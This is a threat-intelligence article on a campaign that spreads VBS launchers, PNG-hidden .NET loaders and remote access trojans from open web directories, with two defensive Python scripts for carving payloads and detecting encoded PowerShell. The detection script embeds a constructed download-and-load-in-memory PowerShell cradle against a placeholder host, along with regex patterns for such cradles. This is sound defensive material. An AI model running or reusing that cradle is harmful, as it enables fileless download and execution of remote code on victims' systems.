Sophisticated Malware Campaign Exploits Open Directories to Deploy Obfuscated Loaders and Remote Access Trojans
In early 2026, cybersecurity researchers uncovered a multi-stage malware campaign that uses open web directories to distribute obfuscated Visual Basic Script (VBS) launchers, loaders hidden inside PNG images, and remote access trojans (RATs). Only the initial VBS file touches disk; every later stage is downloaded and executed in memory, leaving few artifacts on the infected system.
Discovery and Initial Indicators
The campaign came to light when a suspicious VBS file named `Name_File.vbs` was found in the `\Users\Public\Downloads\` directory of a compromised endpoint. SentinelOne’s endpoint protection intercepted and quarantined the file before it ran. Analysis showed that the script carried a Base64-encoded PowerShell command whose purpose was to fetch the next stage from a remote server.
Investigation and Infrastructure Analysis
Further investigation by LevelBlue’s SpiderLabs Cyber Threat Intelligence team showed that the incident was one piece of a larger, organized operation. The attackers used an openly accessible domain, `news4me[.]xyz`, to host multiple obfuscated VBS files, each tied to a different payload, including XWorm variants and Remcos RAT stored as plain text files. The server exposed open directories such as `/coupon/`, `/protector/`, and `/invoice/`, each serving a distinct role in the distribution chain.
Infection Mechanism: From VBS to In-Memory RAT Execution
The attack begins with a VBS file that acts purely as a launcher: it carries no malicious logic of its own beyond starting the next stage. The script uses Unicode obfuscation to hide a Base64-encoded PowerShell command. When it runs, that PowerShell command forces TLS 1.2 for the connection and uses the `Net.WebClient` class to download a PNG image named `MSI_PRO_with_b64.png` from an Internet Archive URL.
The PNG file carries an embedded .NET assembly, PhantomVAI, placed between custom `BaseStart` and `BaseEnd` markers. The loader slices out the bytes between those markers and passes them to `[Reflection.Assembly]::Load`, so the assembly is loaded straight from memory and never written to disk, which defeats file-based scanning. Once active, PhantomVAI retrieves two further payloads:
1. An obfuscated string from `news4me[.]xyz/protector/johnremcos.txt`, which decodes into a functional instance of Remcos RAT, granting the attacker persistent remote access.
2. A PNG file named `uac.png` containing a UAC Bypass DLL, facilitating elevated privileges on the compromised system.
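The PNG-carrier stage described above, as an added triage example that is not part of the original report or of the malware itself: the script builds a constructed PNG-looking blob with a Base64 payload between the `BaseStart` and `BaseEnd` markers named in the article, carves the payload back out, and applies a cheap PE-header check. The real contents of `MSI_PRO_with_b64.png` are not on the page, so the carrier bytes and the fake "assembly" (a bare MZ/PE stub) are invented stand-ins.

```python
import base64
import binascii
import re
from typing import Optional

# Marker strings reported for the campaign; everything around them is constructed here.
START_MARKER = b"BaseStart"
END_MARKER = b"BaseEnd"
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def build_fake_pe() -> bytes:
    """Constructed stand-in for a .NET assembly: a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> offset of the PE signature
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 16


FAKE_ASSEMBLY = build_fake_pe()


def build_sample_carrier(payload: bytes) -> bytes:
    """Construct a PNG-looking carrier: signature, a junk IHDR chunk, then the marked Base64 blob."""
    junk_chunk = b"\x00\x00\x00\x0dIHDR" + b"\x00" * 13 + b"\xde\xad\xbe\xef"
    # Loaders often wrap the Base64 text with line breaks; include some to exercise the cleanup.
    b64 = base64.b64encode(payload)
    wrapped = b"\r\n".join(b64[i:i + 40] for i in range(0, len(b64), 40))
    return PNG_SIGNATURE + junk_chunk + START_MARKER + wrapped + END_MARKER + b"IEND\xaeB`\x82"


def carve_embedded_payload(blob: bytes) -> Optional[bytes]:
    """Return the decoded bytes found between START_MARKER and END_MARKER, or None if absent/invalid."""
    start = blob.find(START_MARKER)
    if start == -1:
        return None
    start += len(START_MARKER)
    end = blob.find(END_MARKER, start)
    if end == -1:
        return None
    # Drop anything outside the Base64 alphabet (line breaks, decoy bytes) before decoding.
    encoded = re.sub(rb"[^A-Za-z0-9+/=]", b"", blob[start:end])
    try:
        return base64.b64decode(encoded, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(data: bytes) -> bool:
    """Triage check: 'MZ' DOS stub and e_lfanew pointing at a 'PE\\0\\0' signature inside the buffer."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_image(blob: bytes) -> dict:
    """Summarise whether a downloaded 'image' is really a marker-wrapped executable payload."""
    payload = carve_embedded_payload(blob)
    return {
        "has_png_signature": blob.startswith(PNG_SIGNATURE),
        "has_markers": payload is not None,
        "payload_size": len(payload) if payload else 0,
        "payload_is_pe": looks_like_pe(payload) if payload else False,
    }


if __name__ == "__main__":
    sample = build_sample_carrier(FAKE_ASSEMBLY)
    print(triage_image(sample))
```

A file that passes `has_png_signature` but also reports `payload_is_pe` is the combination worth alerting on: a genuine image has no reason to carry a PE header between ASCII markers. In practice the marker strings change per campaign, so treat `START_MARKER`/`END_MARKER` as tunable indicators rather than fixed constants.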
Implications and Recommendations
This campaign illustrates how far malware delivery has moved toward open directories and in-memory execution to slip past file-centric defenses. Organizations should consider the following measures:
– Endpoint Detection and Response (EDR): Deploy EDR tooling that can catch fileless behaviour, in particular script hosts (`wscript.exe`, `cscript.exe`) spawning PowerShell with an encoded command, and .NET assemblies loaded from memory. PowerShell script block logging and AMSI integration give such tooling the decoded script content it needs.
– Regular Security Audits: Review network traffic and endpoint activity for anomalies typical of this chain, such as image downloads from archive or file-hosting services followed by outbound connections to unfamiliar domains.
– User Education: Train employees to recognise and report suspicious files and activity, so that scripts dropped into shared locations like `\Users\Public\Downloads\` are reported rather than run.
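As an added example of the detection logic the first recommendation calls for (not code from the original report or from any vendor product), the following script runs over constructed Sysmon-style process-creation events modelling the chain described above: `wscript.exe` running `Name_File.vbs`, which spawns `powershell.exe` with an encoded command that pins TLS 1.2 and downloads a PNG via `Net.WebClient`. The event fields, PIDs, and the placeholder URL `https://example.invalid/...` are all invented for the example; the detection decodes the `-EncodedCommand` argument (Base64 of UTF-16LE text) and flags script-host parents and download-cradle indicators.

```python
import base64
import re

# Constructed download cradle modelling the behaviour reported (TLS 1.2 pin, WebClient fetch of a PNG,
# in-memory assembly load). The URL is a placeholder, not the real one used in the campaign.
CRADLE = (
    "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;"
    "$c=New-Object Net.WebClient;"
    "$d=$c.DownloadData('https://example.invalid/MSI_PRO_with_b64.png');"
    "[Reflection.Assembly]::Load($d)"
)


def encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand takes Base64 of the UTF-16LE encoding of the script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_powershell; raises on malformed input."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


# Constructed process-creation events (Sysmon Event ID 1 style fields, invented for this example).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 612, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5304, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\Public\Downloads\Name_File.vbs"'},
    {"pid": 5388, "ppid": 5304, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(CRADLE)},
    {"pid": 6000, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Indicators of a download-and-load cradle once the command is decoded.
CRADLE_PATTERNS = {
    "webclient": r"Net\.WebClient",
    "download": r"Download(?:Data|String|File)\s*\(",
    "tls_pin": r"SecurityProtocol",
    "reflective_load": r"Reflection\.Assembly\]?::Load",
}

ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def extract_encoded_command(cmdline: str):
    m = ENCODED_FLAG.search(cmdline)
    return m.group(1) if m else None


def detect_script_host_cradles(events):
    """Flag powershell.exe launched by a script host and/or carrying a decoded download cradle."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        parent_name = image_name(parent["image"]) if parent else None
        b64 = extract_encoded_command(e["cmdline"])
        decoded = ""
        if b64:
            try:
                decoded = decode_encoded_command(b64)
            except (ValueError, UnicodeDecodeError):
                decoded = ""  # malformed Base64: still suspicious if parent is a script host
        hits = [name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, decoded)]
        if parent_name in SCRIPT_HOSTS or hits:
            findings.append({"pid": e["pid"], "parent": parent_name, "encoded": b64 is not None,
                             "indicators": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in detect_script_host_cradles(SAMPLE_EVENTS):
        print(f["pid"], f["parent"], f["indicators"])
```

The benign `powershell.exe -NoProfile -Command Get-Process` launched from Explorer produces no finding, while the encoded child of `wscript.exe` is flagged on both the parent relationship and four decoded indicators. Real telemetry will include legitimate admin tooling that uses `-EncodedCommand`; the parent-process condition is what keeps the false-positive rate tolerable.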
By adopting these proactive strategies, organizations can bolster their defenses against increasingly complex malware campaigns that exploit open directories and in-memory execution techniques.